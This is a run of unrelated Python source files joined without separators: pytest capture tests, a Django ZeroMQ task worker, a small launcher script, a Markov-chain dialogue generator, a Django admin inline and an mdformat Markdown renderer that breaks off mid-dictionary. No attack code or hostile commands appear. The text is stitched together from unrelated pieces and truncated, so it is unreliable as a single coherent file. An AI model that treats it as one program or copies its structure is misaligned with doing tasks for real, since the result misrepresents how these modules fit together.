    """FD capturing must still work in a later test after an earlier test
    closed fd 1."""
    testdir.makepyfile("""
        import os
        def test_close():
            os.close(1)
        def test_capture_again():
            os.write(1, b"hello\\n")
            assert 0
    """)
    result = testdir.runpytest_subprocess()
    # The failing test's report must include the output written to fd 1.
    result.stdout.fnmatch_lines("""
        *test_capture_again*
        *assert 0*
        *stdout*
        *hello*
    """)


@pytest.mark.parametrize('method', ['SysCapture', 'FDCapture'])
def test_capturing_and_logging_fundamentals(testdir, method):
    """Capturing must interoperate with the logging module: records emitted
    while capturing are captured, and pop_outerr_to_orig() replays pending
    output to the original streams."""
    # Bug fix: the guard previously compared against "StdCaptureFD", a value
    # the parametrization never supplies, so it was dead code and the
    # FD-based variant would run even without os.dup.
    if method == "FDCapture" and not hasattr(os, 'dup'):
        pytest.skip("need os.dup")
    # here we check a fundamental feature
    p = testdir.makepyfile("""
        import sys, os
        import py, logging
        from _pytest import capture
        cap = capture.MultiCapture(out=False, in_=False,
                                     Capture=capture.%s)
        cap.start_capturing()

        logging.warn("hello1")
        outerr = cap.readouterr()
        print ("suspend, captured %%s" %%(outerr,))
        logging.warn("hello2")

        cap.pop_outerr_to_orig()
        logging.warn("hello3")

        outerr = cap.readouterr()
        print ("suspend2, captured %%s" %% (outerr,))
    """ % (method,))
    result = testdir.runpython(p)
    result.stdout.fnmatch_lines("""
        suspend, captured*hello1*
        suspend2, captured*WARNING:root:hello3*
    """)
    result.stderr.fnmatch_lines("""
        WARNING:root:hello2
    """)
    assert "atexit" not in result.stderr.str()


def test_error_attribute_issue555(testdir):
    """Captured std streams must expose errors == "strict" (issue #555)."""
    testdir.makepyfile("""
        import sys
        def test_capattr():
            assert sys.stdout.errors == "strict"
            assert sys.stderr.errors == "strict"
    """)
    reprec = testdir.inline_run()
    reprec.assertoutcome(passed=1)


@pytest.mark.skipif(not sys.platform.startswith('win') and sys.version_info[:2] >= (3, 6),
                    reason='only py3.6+ on windows')
def test_py36_windowsconsoleio_workaround_non_standard_streams():
    """
    Ensure _py36_windowsconsoleio_workaround function works with objects that
    do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).

    NOTE(review): the skipif expression only skips on *non*-Windows py3.6+,
    while the reason string suggests the test should run only on py3.6+
    Windows -- confirm whether ``or`` was intended instead of ``and``.
    """
    from _pytest.capture import _py36_windowsconsoleio_workaround

    # Minimal object exposing only write(); deliberately lacks buffer/fileno.
    class DummyStream(object):
        def write(self, s):
            pass

    stream = DummyStream()
    _py36_windowsconsoleio_workaround(stream)


def test_dontreadfrominput_has_encoding(testdir):
    """Captured stdout/stderr must expose an ``encoding`` attribute."""
    testdir.makepyfile("""
        import sys
        def test_capattr():
            # should not raise AttributeError
            assert sys.stdout.encoding
            assert sys.stderr.encoding
    """)
    reprec = testdir.inline_run()
    reprec.assertoutcome(passed=1)


def test_crash_on_closing_tmpfile_py27(testdir):
    """A daemon thread still writing to sys.stderr while the capture tmpfile
    is being closed at teardown must not crash the run (py27 IOError)."""
    testdir.makepyfile('''
        from __future__ import print_function
        import time
        import threading
        import sys

        def spam():
            f = sys.stderr
            while True:
                print('.', end='', file=f)

        def test_silly():
            t = threading.Thread(target=spam)
            t.daemon = True
            t.start()
            time.sleep(0.5)

    ''')
    result = testdir.runpytest_subprocess()
    assert result.ret == 0
    assert 'IOError' not in result.stdout.str()


def test_pickling_and_unpickling_encoded_file():
    """Regression test: unpickling an EncodedFile must not recurse forever.

    pickle.loads() raises infinite recursion if EncodedFile.__getattr__ is
    not implemented properly.
    See https://bitbucket.org/pytest-dev/pytest/pull-request/194
    """
    encoded_file = capture.EncodedFile(None, None)
    pickled = pickle.dumps(encoded_file)
    pickle.loads(pickled)

import zmq
import datetime
import pytz

from django.core.management.base import BaseCommand, CommandError
from django.conf import settings

from registrations.models import Registration
from registrations import handlers
from registrations import tasks

class Command(BaseCommand):
    """Long-running worker: pulls task messages from a ZeroMQ PULL socket
    and dispatches them to functions in the ``registrations.tasks`` module."""

    def log(self, message):
        """Append a timestamped line to the task log file and echo it to stdout."""
        now = datetime.datetime.utcnow().replace(tzinfo=pytz.utc)
        log_message = "%s\t%s\n" % (now, message)
        self.stdout.write(log_message)
        # Context manager guarantees the handle is closed even if write fails
        # (the original opened/closed the file manually and could leak it).
        with open(settings.TASK_LOG_PATH, 'a') as f:
            f.write(log_message)

    def handle(self, *args, **options):
        context = zmq.Context()
        pull_socket = context.socket(zmq.PULL)
        pull_socket.bind('tcp://*:7002')
        self.log("Registration Worker ZMQ Socket Bound to 7002")

        while True:
            try:
                data = pull_socket.recv_json()
                task_name = data.pop('task')
                task_kwargs = data.pop('kwargs')
                self.log("Got task '%s' with kwargs: %s" % (task_name, task_kwargs))
                if hasattr(tasks, task_name):
                    result = getattr(tasks, task_name)(**task_kwargs)
                    self.log("Task '%s' result: %s" % (task_name, result))
                else:
                    # Bug fix: log() takes a single message argument, so the
                    # task name must be interpolated here; passing it as a
                    # second positional argument raised TypeError.
                    self.log("Received unknown task: %s" % task_name)
            # "except Exception as e" replaces the Python-2-only
            # "except Exception, e" syntax (valid on 2.6+ and 3.x).
            # Broad catch is deliberate: the worker must stay alive.
            except Exception as e:
                self.log("Error: %s" % e)

        # NOTE(review): unreachable -- the loop above never breaks; kept for
        # parity with the original in case a shutdown condition is added.
        pull_socket.close()
        context.term()

#!/usr/bin/python
from noisemapper.mapper import *
#from collectors.lib import utils

### Define the object mapper and start mapping


def main():
    """Instantiate the noise mapper and run it until it exits."""
    # utils.drop_privileges()  # left disabled, as in the original
    noise_mapper = NoiseMapper()
    noise_mapper.run()


if __name__ == "__main__":
    main()

import numpy as np
from numpy import cumsum, sum, searchsorted
from numpy.random import rand
import math
import utils
import core.sentence as sentence
import core.markovchain as mc
import logging

logger = logging.getLogger(__name__)

# Dialogue making class. Need to review where to return a string, where to return a list of tokens, etc.
# setters: list of speakers, pronouns, priors etc.
# random transitions
# Internal: build list of structures:
#     e.g.{:speaker_name "Alice", :speaker_pronoun "she", :speaker_str "she", :speech_verb "said", :position "end"}
# Then end with fn that maps that out to a suitable string
#     e.g. "<SPEECH>, she said."
# External bit then replaces <SPEECH> with a markov-chain-generated sentence (or several).


class dialogue_maker(object):
    """Class to handle creating dialogue based on a list of speakers and a sentence generator."""
    def __init__(self, names, pronouns, mc):
        # One record per speaker; zip pairs each name with its pronoun.
        self.speakers = [{"name": n, "pronoun": p} for n, p in list(zip(names, pronouns))]
        self._transitions = self.make_transition_probs()
        # Speech verbs with heavily skewed weights so "said" dominates.
        self._speech_acts = ["said", "whispered", "shouted", "cried"]
        self._acts_transitions = [25, 2, 2, 2]
        self.mc = mc
        # self.seeds = seeds
        self.target_len = np.random.randint(5, 50, size=len(names))  # rough words per sentence

    def make_transition_probs(self):
        """Make transition matrix between speakers, with random symmetric biases added in"""
        n = len(self.speakers)  # TODO why this line ???
        transitions = np.random.randint(5, size=(n, n)) + 1
        transitions += transitions.transpose()
        # Bias a few random speaker pairs (slightly asymmetrically) so some
        # pairs address each other more often.
        for i in range(0, math.floor(n / 2)):
            s1 = np.random.randint(n)
            s2 = np.random.randint(n)
            transitions[s1][s2] += 10
            transitions[s2][s1] += 8
        return(transitions)

    def after(self, speaker_id):
        """Pick next person to speak"""
        # Weighted draw from the current speaker's transition row.
        row = self._transitions[speaker_id]
        sucessor = searchsorted(cumsum(row), rand() * sum(row))
        return sucessor

    def speaker_sequence(self, speaker_id, n):
        """Random walk through transitions matrix to produce a sequence of speaker ids"""
        seq = []
        for i in range(n):
            seq.append(speaker_id)
            speaker_id = self.after(speaker_id)
        return seq

    def speech_sequence(self, n):
        """Draw n speech verbs, weighted by self._acts_transitions."""
        speech_acts_seq = []
        next_speech_id = 0
        for i in range(n):
            next_speech_id = searchsorted(cumsum(self._acts_transitions), rand() * sum(self._acts_transitions))
            speech_acts_seq.append(self._speech_acts[next_speech_id])
        return speech_acts_seq

    def seq_to_names(self, sequence):
        """Map a sequence of speaker ids to the speaker records."""
        return([self.speakers[id] for id in sequence])

    def make_speech_bits(self, seeds):
        """Build one speech record per seed word: speaker, verb and a
        generated, polished sentence."""
        n = len(seeds)
        speaker_id = self.speaker_sequence(0, n)
        speech_acts_seq = self.speech_sequence(n)
        bits = []
        ss = sentence.SentenceMaker(self.mc)
        for i in range(n):
            sent_toks = ss.generate_sentence_tokens([seeds[i]], self.target_len[speaker_id[i]])
            sent_toks = ss.polish_sentence(sent_toks)
            # NOTE(review): speech_acts_seq is indexed by the speaker id,
            # not by the utterance index i -- possibly intended to be
            # speech_acts_seq[i]; confirm (could also raise IndexError if a
            # speaker id ever exceeded n - 1).
            bits.append({'speaker_name': self.speakers[speaker_id[i]]["name"],
                         'speech_act': speech_acts_seq[speaker_id[i]],
                         'seq_id': speaker_id[i],
                         'speech': sent_toks,
                         'paragraph': True})
        return(bits)

    def simplify(self, seq_map):
        "Take a sequence of speech parts and make more natural by removing name repetition etc."
        for i in range(0, len(seq_map)):
            seq_map[i]['speaker_str'] = seq_map[i]['speaker_name']  # default
            # Same speaker continues: drop attribution and paragraph break.
            if i > 0 and seq_map[i]['seq_id'] == seq_map[i - 1]['seq_id']:
                seq_map[i]['speaker_str'] = ""
                seq_map[i]['speech_act'] = ""
                seq_map[i]['paragraph'] = False
            else:
                # Simple back-and-forth (same speaker as two turns ago):
                # drop attribution but keep the paragraph break.
                if i > 1 and seq_map[i]['seq_id'] == seq_map[i - 2]['seq_id'] \
                   and seq_map[i]['seq_id'] != seq_map[i - 1]['seq_id']:
                    seq_map[i]['speaker_str'] = ""
                    seq_map[i]['speech_act'] = ""
                    seq_map[i]['paragraph'] = True
        return seq_map

    def report_seq(self, seq_map):
        """Convert sequence of speeches to a tokens."""
        sents = []
        for i in range(0, len(seq_map)):

            if seq_map[i]['paragraph']:
                # text += "\n    "
                quote_start = '"'
            else:
                quote_start = ""
            # Close the quote when this is the last speech or the next one
            # starts a new paragraph.
            if i > len(seq_map) - 2 or seq_map[i + 1]['paragraph']:
                quote_end = '"'
            else:
                quote_end = " "
            if len(seq_map[i]['speech_act']) > 0:
                speech_act = seq_map[i]['speech_act'] + ","
            else:
                speech_act = seq_map[i]['speech_act']
            tokens = [utils.START_TOKEN]
            tokens.append(seq_map[i]['speaker_str'])
            tokens.append(speech_act)
            tokens.append(quote_start)
            # Drop the sentence's own start/end tokens; ours are added here.
            tokens.extend(seq_map[i]['speech'][1:-1])
            tokens.append(quote_end)
            tokens.append(utils.END_TOKEN)
            sents.append(tokens)
        return sents

    def make_dialogue(self, seeds):
        """Returns a list of sentences, each being a list of tokens."""
        acts = self.make_speech_bits(seeds)
        seq_map = self.simplify(acts)
        sents = self.report_seq(seq_map)
        return(sents)


def dev():
    """Ad-hoc manual smoke test: build three random speakers and print a
    short generated dialogue."""
    import knowledge.names as names

    mcW = mc.MarkovChain()
    nm = names.NameMaker()
    # range(1, 4) yields exactly three speakers.
    speakers = [nm.random_person() for i in range(1, 4)]
    dm = dialogue_maker([n['name'] for n in speakers], [n['pronoun'] for n in speakers], mcW)
    dlg = dm.make_dialogue(["dog", "run", "spot"])
    print(dlg)

# -*- coding: utf-8 -*-

from django.contrib.admin import TabularInline
from .models import GalleryPhoto


class PhotoInline(TabularInline):
    """
    Tabular inline that will be displayed in the gallery form during frontend
    editing or in the admin site.
    """
    # Model edited by each inline row.
    model = GalleryPhoto
    # Name of the ForeignKey on GalleryPhoto to use (standard TabularInline option).
    fk_name = "gallery"

from __future__ import annotations

from collections import defaultdict
from collections.abc import Generator, Iterable, Mapping, MutableMapping
from contextlib import contextmanager
import logging
import re
import textwrap
from types import MappingProxyType
from typing import TYPE_CHECKING, Any, NamedTuple

from markdown_it.rules_block.html_block import HTML_SEQUENCES

from mdformat import codepoints
from mdformat._compat import Literal
from mdformat._conf import DEFAULT_OPTS
from mdformat.renderer._util import (
    RE_CHAR_REFERENCE,
    decimalify_leading,
    decimalify_trailing,
    escape_asterisk_emphasis,
    escape_underscore_emphasis,
    get_list_marker_type,
    is_tight_list,
    is_tight_list_item,
    longest_consecutive_sequence,
    maybe_add_link_brackets,
)
from mdformat.renderer.typing import Postprocess, Render

if TYPE_CHECKING:
    from mdformat.renderer import RenderTreeNode

LOGGER = logging.getLogger(__name__)

# A marker used to point a location where word wrap is allowed
# to occur.
WRAP_POINT = "\x00"
# A marker used to indicate location of a character that should be preserved
# during word wrap. Should be converted to the actual character after wrap.
# NOTE(review): both markers are the NUL character; `_prepare_wrap` converts
# wrap points to spaces before emitting preserve markers, so the shared value
# appears intentional -- confirm before changing either.
PRESERVE_CHAR = "\x00"


def make_render_children(separator: str) -> Render:
    """Build a renderer that renders a node's children and joins the
    results with ``separator``."""

    def render_children(
        node: RenderTreeNode,
        context: RenderContext,
    ) -> str:
        rendered = (child.render(context) for child in node.children)
        return separator.join(rendered)

    return render_children


def hr(node: RenderTreeNode, context: RenderContext) -> str:
    """Render a thematic break as a fixed-width line of underscores."""
    width = 70
    return width * "_"


def code_inline(node: RenderTreeNode, context: RenderContext) -> str:
    """Render an inline code span, extending/padding the backtick delimiter
    as needed so the content cannot terminate it early."""
    code = node.content
    only_whitespace = not code.strip()
    backtick_run = longest_consecutive_sequence(code, "`")
    if backtick_run:
        # Delimiter must be longer than any backtick run inside the code.
        delimiter = "`" * (backtick_run + 1)
        return f"{delimiter} {code} {delimiter}"
    # Pad when the span both starts and ends with a space (and is not all
    # whitespace) so the spaces are not stripped by the parser.
    if code.startswith(" ") and code.endswith(" ") and not only_whitespace:
        return f"` {code} `"
    return f"`{code}`"


def html_block(node: RenderTreeNode, context: RenderContext) -> str:
    """Render an HTML block: drop trailing newlines and leading whitespace.

    Leading whitespace is stripped because regular Markdown is stripped
    too; keeping it would mis-align raw HTML and Markdown and could change
    semantics.
    """
    return node.content.rstrip("\n").lstrip()


def html_inline(node: RenderTreeNode, context: RenderContext) -> str:
    """Render inline HTML verbatim."""
    raw_html = node.content
    return raw_html


def _in_block(block_name: str, node: RenderTreeNode) -> bool:
    while node.parent:
        if node.parent.type == block_name:
            return True
        node = node.parent
    return False


def hardbreak(node: RenderTreeNode, context: RenderContext) -> str:
    """Render a hard line break; headings get an HTML break since a
    backslash break cannot appear there."""
    inside_heading = _in_block("heading", node)
    return "<br /> " if inside_heading else "\\\n"


def softbreak(node: RenderTreeNode, context: RenderContext) -> str:
    """Render a soft break: a wrap opportunity when word wrap is enabled
    inside a paragraph, otherwise a literal newline."""
    wrap_here = context.do_wrap and _in_block("paragraph", node)
    return WRAP_POINT if wrap_here else "\n"


def text(node: RenderTreeNode, context: RenderContext) -> str:
    """Process a text token.

    Text should always be a child of an inline token. An inline token
    should always be enclosed by a heading or a paragraph.
    """
    text = node.content

    # Escape backslash to prevent it from making unintended escapes.
    # This escape has to be first, else we start multiplying backslashes.
    text = text.replace("\\", "\\\\")

    text = escape_asterisk_emphasis(text)  # Escape emphasis/strong marker.
    text = escape_underscore_emphasis(text)  # Escape emphasis/strong marker.
    text = text.replace("[", "\\[")  # Escape link label enclosure
    text = text.replace("]", "\\]")  # Escape link label enclosure
    text = text.replace("<", "\\<")  # Escape URI enclosure
    text = text.replace("`", "\\`")  # Escape code span marker

    # Escape "&" if it starts a sequence that can be interpreted as
    # a character reference.
    text = RE_CHAR_REFERENCE.sub(r"\\\g<0>", text)

    # The parser can give us consecutive newlines which can break
    # the markdown structure. Replace two or more consecutive newlines
    # with newline character's decimal reference.
    text = text.replace("\n\n", "&#10;&#10;")

    # If the last character is a "!" and the token next up is a link, we
    # have to escape the "!" or else the link will be interpreted as image.
    next_sibling = node.next_sibling
    if text.endswith("!") and next_sibling and next_sibling.type == "link":
        text = text[:-1] + "\\!"

    # Only paragraph content receives wrap points; whitespace runs collapse
    # into a single WRAP_POINT marker for the wrapper to act on.
    if context.do_wrap and _in_block("paragraph", node):
        text = re.sub(r"\s+", WRAP_POINT, text)

    return text


def fence(node: RenderTreeNode, context: RenderContext) -> str:
    """Render a fenced code block, applying any configured code formatter
    for the block's language."""
    info_str = node.info.strip()
    lang = info_str.split(maxsplit=1)[0] if info_str else ""
    code_block = node.content

    # Info strings of backtick code fences cannot contain backticks.
    # If that is the case, we make a tilde code fence instead.
    fence_char = "~" if "`" in info_str else "`"

    # Format the code block using enabled codeformatter funcs
    if lang in context.options.get("codeformatters", {}):
        fmt_func = context.options["codeformatters"][lang]
        try:
            code_block = fmt_func(code_block, info_str)
        except Exception:
            # Swallow exceptions so that formatter errors (e.g. due to
            # invalid code) do not crash mdformat.
            assert node.map is not None, "A fence token must have `map` attribute set"
            filename = context.options.get("mdformat", {}).get("filename", "")
            warn_msg = (
                f"Failed formatting content of a {lang} code block "
                f"(line {node.map[0] + 1} before formatting)"
            )
            if filename:
                # Bug fix: interpolate the actual filename -- the previous
                # f-string contained no placeholder and always logged the
                # literal text "(unknown)".
                warn_msg += f". Filename: {filename}"
            LOGGER.warning(warn_msg)

    # The code block must not include as long or longer sequence of `fence_char`s
    # as the fence string itself
    fence_len = max(3, longest_consecutive_sequence(code_block, fence_char) + 1)
    fence_str = fence_char * fence_len

    return f"{fence_str}{info_str}\n{code_block}{fence_str}"


def code_block(node: RenderTreeNode, context: RenderContext) -> str:
    """Render an indented code block by delegating to the fence renderer."""
    return fence(node, context)


def image(node: RenderTreeNode, context: RenderContext) -> str:
    """Render an image, preferring reference-style output when the source
    used a reference label."""
    alt_text = _render_inline_as_text(node, context)

    if context.do_wrap:
        # Line breaks inside an image description are not allowed.
        alt_text = alt_text.replace(WRAP_POINT, " ")

    ref_label = node.meta.get("label")
    if ref_label:
        context.env["used_refs"].add(ref_label)
        label = ref_label.lower()
        # Collapsed reference when the description matches the label.
        if alt_text.lower() == label:
            return f"![{alt_text}]"
        return f"![{alt_text}][{label}]"

    uri = node.attrs["src"]
    assert isinstance(uri, str)
    uri = maybe_add_link_brackets(uri)
    title = node.attrs.get("title")
    if title is None:
        return f"![{alt_text}]({uri})"
    return f'![{alt_text}]({uri} "{title}")'


def _render_inline_as_text(node: RenderTreeNode, context: RenderContext) -> str:
    """Special kludge for image `alt` attributes to conform CommonMark spec.

    Don't try to use it! Spec requires to show `alt` content with
    stripped markup, instead of simple escaping.
    """

    def text_renderer(node: RenderTreeNode, context: RenderContext) -> str:
        # Plain text is emitted verbatim (no escaping).
        return node.content

    def image_renderer(node: RenderTreeNode, context: RenderContext) -> str:
        # Nested images are flattened recursively.
        return _render_inline_as_text(node, context)

    # Any token type not listed falls back to rendering its children joined
    # with the empty string.
    inline_renderers: Mapping[str, Render] = defaultdict(
        lambda: make_render_children(""),
        {
            "text": text_renderer,
            "image": image_renderer,
            "link": link,
            "softbreak": softbreak,
        },
    )
    inline_context = RenderContext(
        inline_renderers, context.postprocessors, context.options, context.env
    )
    return make_render_children("")(node, inline_context)


def link(node: RenderTreeNode, context: RenderContext) -> str:
    """Render a link: autolinks as ``<uri>``, reference links by label,
    otherwise in inline ``[text](uri "title")`` form."""
    if node.info == "auto":
        autolink_url = node.attrs["href"]
        assert isinstance(autolink_url, str)
        # The parser adds a "mailto:" prefix to autolink email href. We remove
        # the prefix if it wasn't there in the source.
        source_text = node.children[0].content
        if autolink_url.startswith("mailto:") and not source_text.startswith(
            "mailto:"
        ):
            autolink_url = autolink_url[len("mailto:"):]
        return f"<{autolink_url}>"

    link_text = "".join(child.render(context) for child in node.children)

    if context.do_wrap:
        # Line breaks inside link text are not allowed.
        link_text = link_text.replace(WRAP_POINT, " ")

    ref_label = node.meta.get("label")
    if ref_label:
        context.env["used_refs"].add(ref_label)
        label = ref_label.lower()
        # Collapsed reference when the text matches the label.
        if link_text.lower() == label:
            return f"[{link_text}]"
        return f"[{link_text}][{label}]"

    uri = node.attrs["href"]
    assert isinstance(uri, str)
    uri = maybe_add_link_brackets(uri)
    title = node.attrs.get("title")
    if title is None:
        return f"[{link_text}]({uri})"
    assert isinstance(title, str)
    escaped_title = title.replace('"', '\\"')
    return f'[{link_text}]({uri} "{escaped_title}")'


def em(node: RenderTreeNode, context: RenderContext) -> str:
    """Wrap the rendered children in the node's original emphasis marker."""
    marker = node.markup
    inner = make_render_children(separator="")(node, context)
    return f"{marker}{inner}{marker}"


def strong(node: RenderTreeNode, context: RenderContext) -> str:
    """Wrap the rendered children in the node's original strong marker."""
    marker = node.markup
    inner = make_render_children(separator="")(node, context)
    return f"{marker}{inner}{marker}"


def heading(node: RenderTreeNode, context: RenderContext) -> str:
    """Render a heading in ATX style, converting setext markup."""
    content = make_render_children(separator="")(node, context)

    # Map setext markers to the equivalent ATX prefix; ATX markup is reused.
    if node.markup == "=":
        prefix = "# "
    elif node.markup == "-":
        prefix = "## "
    else:
        prefix = node.markup + " "

    # There can be newlines in setext headers, but we make an ATX
    # header always. Convert newlines to spaces.
    content = content.replace("\n", " ")

    # If the text ends in a sequence of hashes (#), the hashes will be
    # interpreted as an optional closing sequence of the heading, and
    # will not be rendered. Escape a line ending hash to prevent this.
    if content.endswith("#"):
        content = content[:-1] + "\\#"

    return prefix + content


def blockquote(node: RenderTreeNode, context: RenderContext) -> str:
    """Render a block quote, prefixing each content line with "> " (bare
    ">" for empty lines)."""
    marker = "> "
    with context.indented(len(marker)):
        body = make_render_children(separator="\n\n")(node, context)
        lines = body.splitlines()
        if not lines:
            return ">"
        prefixed = [f"{marker}{line}" if line else ">" for line in lines]
        return "\n".join(prefixed)


def _wrap(text: str, *, width: int | Literal["no"]) -> str:
    """Wrap text at locations pointed by `WRAP_POINT`s.

    Converts `WRAP_POINT`s to either a space or newline character, thus
    wrapping the text. Already existing whitespace will be preserved as
    is.
    """
    prepared, replacements = _prepare_wrap(text)
    if width == "no":
        return _recover_preserve_chars(prepared, replacements)

    wrapper = textwrap.TextWrapper(
        break_long_words=False,
        break_on_hyphens=False,
        width=width,
        expand_tabs=False,
        replace_whitespace=False,
    )
    filled = _recover_preserve_chars(wrapper.fill(prepared), replacements)
    # textwrap drops a leading space; restore it when the prepared text
    # started with one.
    if prepared.startswith(" "):
        return " " + filled
    return filled


def _prepare_wrap(text: str) -> tuple[str, str]:
    """Prepare text for wrap.

    Convert `WRAP_POINT`s to spaces. Convert whitespace to
    `PRESERVE_CHAR`s. Return a tuple with the prepared string, and
    another string consisting of replacement characters for
    `PRESERVE_CHAR`s.
    """
    prepared = []
    replacements = []
    for char in text:
        if char == WRAP_POINT:
            # Collapse consecutive wrap points into a single space.
            if not prepared or prepared[-1] != " ":
                prepared.append(" ")
        elif char in codepoints.UNICODE_WHITESPACE:
            prepared.append(PRESERVE_CHAR)
            replacements.append(char)
        else:
            prepared.append(char)
    return "".join(prepared), "".join(replacements)


def _recover_preserve_chars(text: str, replacements: str) -> str:
    """Substitute each `PRESERVE_CHAR` in ``text`` with the corresponding
    character from ``replacements``, in order."""
    source = iter(replacements)
    restored = [next(source) if char == PRESERVE_CHAR else char for char in text]
    return "".join(restored)


def paragraph(node: RenderTreeNode, context: RenderContext) -> str:  # noqa: C901
    """Render a paragraph: optionally word-wrap it, then escape anything
    that could make one of its lines parse as a different block construct."""
    inline_node = node.children[0]
    text = inline_node.render(context)

    if context.do_wrap:
        wrap_mode = context.options["mdformat"]["wrap"]
        if isinstance(wrap_mode, int):
            # Shrink the target width by the current indentation so nested
            # content still fits within the requested total width.
            wrap_mode -= context.env["indent_width"]
            wrap_mode = max(1, wrap_mode)
        text = _wrap(text, width=wrap_mode)

    # A paragraph can start or end in whitespace e.g. if the whitespace was
    # in decimal representation form. We need to re-decimalify it, one reason being
    # to enable "empty" paragraphs with whitespace only.
    text = decimalify_leading(codepoints.UNICODE_WHITESPACE, text)
    text = decimalify_trailing(codepoints.UNICODE_WHITESPACE, text)

    lines = text.split("\n")
    for i in range(len(lines)):
        # Strip whitespace to prevent issues like a line starting tab that is
        # interpreted as start of a code block.
        lines[i] = lines[i].strip()

        # If a line looks like an ATX heading, escape the first hash.
        if re.match(r"#{1,6}( |\t|$)", lines[i]):
            lines[i] = f"\\{lines[i]}"

        # Make sure a paragraph line does not start with ">"
        # (otherwise it will be interpreted as a block quote).
        if lines[i].startswith(">"):
            lines[i] = f"\\{lines[i]}"

        # Make sure a paragraph line does not start with "*", "-" or "+"
        # followed by a space, tab, or end of line.
        # (otherwise it will be interpreted as list item).
        if re.match(r"[-*+]( |\t|$)", lines[i]):
            lines[i] = f"\\{lines[i]}"

        # If a line starts with a number followed by "." or ")" followed by
        # a space, tab or end of line, escape the "." or ")" or it will be
        # interpreted as ordered list item.
        if re.match(r"[0-9]+\)( |\t|$)", lines[i]):
            lines[i] = lines[i].replace(")", "\\)", 1)
        if re.match(r"[0-9]+\.( |\t|$)", lines[i]):
            lines[i] = lines[i].replace(".", "\\.", 1)

        # Consecutive "-", "*" or "_" sequences can be interpreted as thematic
        # break. Escape them.
        space_removed = lines[i].replace(" ", "").replace("\t", "")
        if len(space_removed) >= 3:
            if all(c == "*" for c in space_removed):
                lines[i] = lines[i].replace("*", "\\*", 1)  # pragma: no cover
            elif all(c == "-" for c in space_removed):
                lines[i] = lines[i].replace("-", "\\-", 1)
            elif all(c == "_" for c in space_removed):
                lines[i] = lines[i].replace("_", "\\_", 1)  # pragma: no cover

        # A stripped line where all characters are "=" or "-" will be
        # interpreted as a setext heading. Escape.
        stripped = lines[i].strip(" \t")
        if all(c == "-" for c in stripped):
            lines[i] = lines[i].replace("-", "\\-", 1)
        elif all(c == "=" for c in stripped):
            lines[i] = lines[i].replace("=", "\\=", 1)

        # Check if the line could be interpreted as an HTML block.
        # If yes, prefix it with 4 spaces to prevent this.
        for html_seq_tuple in HTML_SEQUENCES:
            can_break_paragraph = html_seq_tuple[2]
            opening_re = html_seq_tuple[0]
            if can_break_paragraph and opening_re.search(lines[i]):
                lines[i] = f"    {lines[i]}"
                break

    text = "\n".join(lines)

    return text


def list_item(node: RenderTreeNode, context: RenderContext) -> str:
    """Return one list item as string.

    This returns just the content. List item markers and indentation are
    added in `bullet_list` and `ordered_list` renderers.
    """
    separator = "\n" if is_tight_list_item(node) else "\n\n"
    rendered = make_render_children(separator)(node, context)
    # An all-whitespace item renders as an empty string.
    return rendered if rendered.strip() else ""


def bullet_list(node: RenderTreeNode, context: RenderContext) -> str:
    """Render an unordered list: render each item, prefix its first line
    with the list marker and indent continuation lines to match."""
    marker_type = get_list_marker_type(node)
    first_line_indent = " "
    # Continuation lines align under the first character after the marker.
    indent = " " * len(marker_type + first_line_indent)
    block_separator = "\n" if is_tight_list(node) else "\n\n"

    with context.indented(len(indent)):
        text = ""
        for child_idx, child in enumerate(node.children):
            list_item = child.render(context)
            formatted_lines = []
            line_iterator = iter(list_item.split("\n"))
            first_line = next(line_iterator)
            # A bare marker is emitted for an empty first line so no
            # trailing space is produced.
            formatted_lines.append(
                f"{marker_type}{first_line_indent}{first_line}"
                if first_line
                else marker_type
            )
            for line in line_iterator:
                formatted_lines.append(f"{indent}{line}" if line else "")

            text += "\n".join(formatted_lines)
            if child_idx != len(node.children) - 1:
                text += block_separator

        return text


def ordered_list(node: RenderTreeNode, context: RenderContext) -> str:
    """Render an ordered list, numbering items either consecutively or with
    a repeated "1" marker depending on the ``number`` option."""
    consecutive_numbering = context.options.get("mdformat", {}).get(
        "number", DEFAULT_OPTS["number"]
    )
    marker_type = get_list_marker_type(node)
    first_line_indent = " "
    block_separator = "\n" if is_tight_list(node) else "\n\n"
    list_len = len(node.children)

    starting_number = node.attrs.get("start")
    if starting_number is None:
        starting_number = 1
    assert isinstance(starting_number, int)

    # Continuation lines are indented by the width of the widest marker.
    if consecutive_numbering:
        indent_width = len(
            f"{list_len + starting_number - 1}{marker_type}{first_line_indent}"
        )
    else:
        indent_width = len(f"{starting_number}{marker_type}{first_line_indent}")

    text = ""
    with context.indented(indent_width):
        for list_item_index, list_item in enumerate(node.children):
            list_item_text = list_item.render(context)
            formatted_lines = []
            line_iterator = iter(list_item_text.split("\n"))
            first_line = next(line_iterator)
            if consecutive_numbering:
                # Prefix first line of the list item with consecutive numbering,
                # padded with zeros to make all markers of even length.
                # E.g.
                #   002. This is the first list item
                #   003. Second item
                #   ...
                #   112. Last item
                number = starting_number + list_item_index
                pad = len(str(list_len + starting_number - 1))
                number_str = str(number).rjust(pad, "0")
                formatted_lines.append(
                    f"{number_str}{marker_type}{first_line_indent}{first_line}"
                    if first_line
                    else f"{number_str}{marker_type}"
                )
            else:
                # Prefix first line of first item with the starting number of the
                # list. Prefix following list items with the number one
                # prefixed by zeros to make the list item marker of even length
                # with the first one.
                # E.g.
                #   5321. This is the first list item
                #   0001. Second item
                #   0001. Third item
                first_item_marker = f"{starting_number}{marker_type}"
                other_item_marker = (
                    "0" * (len(str(starting_number)) - 1) + "1" + marker_type
                )
                if list_item_index == 0:
                    formatted_lines.append(
                        f"{first_item_marker}{first_line_indent}{first_line}"
                        if first_line
                        else first_item_marker
                    )
                else:
                    formatted_lines.append(
                        f"{other_item_marker}{first_line_indent}{first_line}"
                        if first_line
                        else other_item_marker
                    )
            for line in line_iterator:
                formatted_lines.append(" " * indent_width + line if line else "")

            text += "\n".join(formatted_lines)
            if list_item_index != len(node.children) - 1:
                text += block_separator

        return text


# Token type -> default renderer function. Exposed as a read-only view
# (MappingProxyType); RenderContext.with_default_renderer_for reads from it
# when resetting individual renderers.
DEFAULT_RENDERERS: Mapping[str, Render] = MappingProxyType(
    {
        "inline": make_render_children(""),
        "root": make_render_children("\n\n"),
        "hr": hr,
        "code_inline": code_inline,
        "html_block": html_block,
        "html_inline": html_inline,
        "hardbreak": hardbreak,
        "softbreak": softbreak,
        "text": text,
        "fence": fence,
        "code_block": code_block,
        "link": link,
        "image": image,
        "em": em,
        "strong": strong,
        "heading": heading,
        "blockquote": blockquote,
        "paragraph": paragraph,
        "bullet_list": bullet_list,
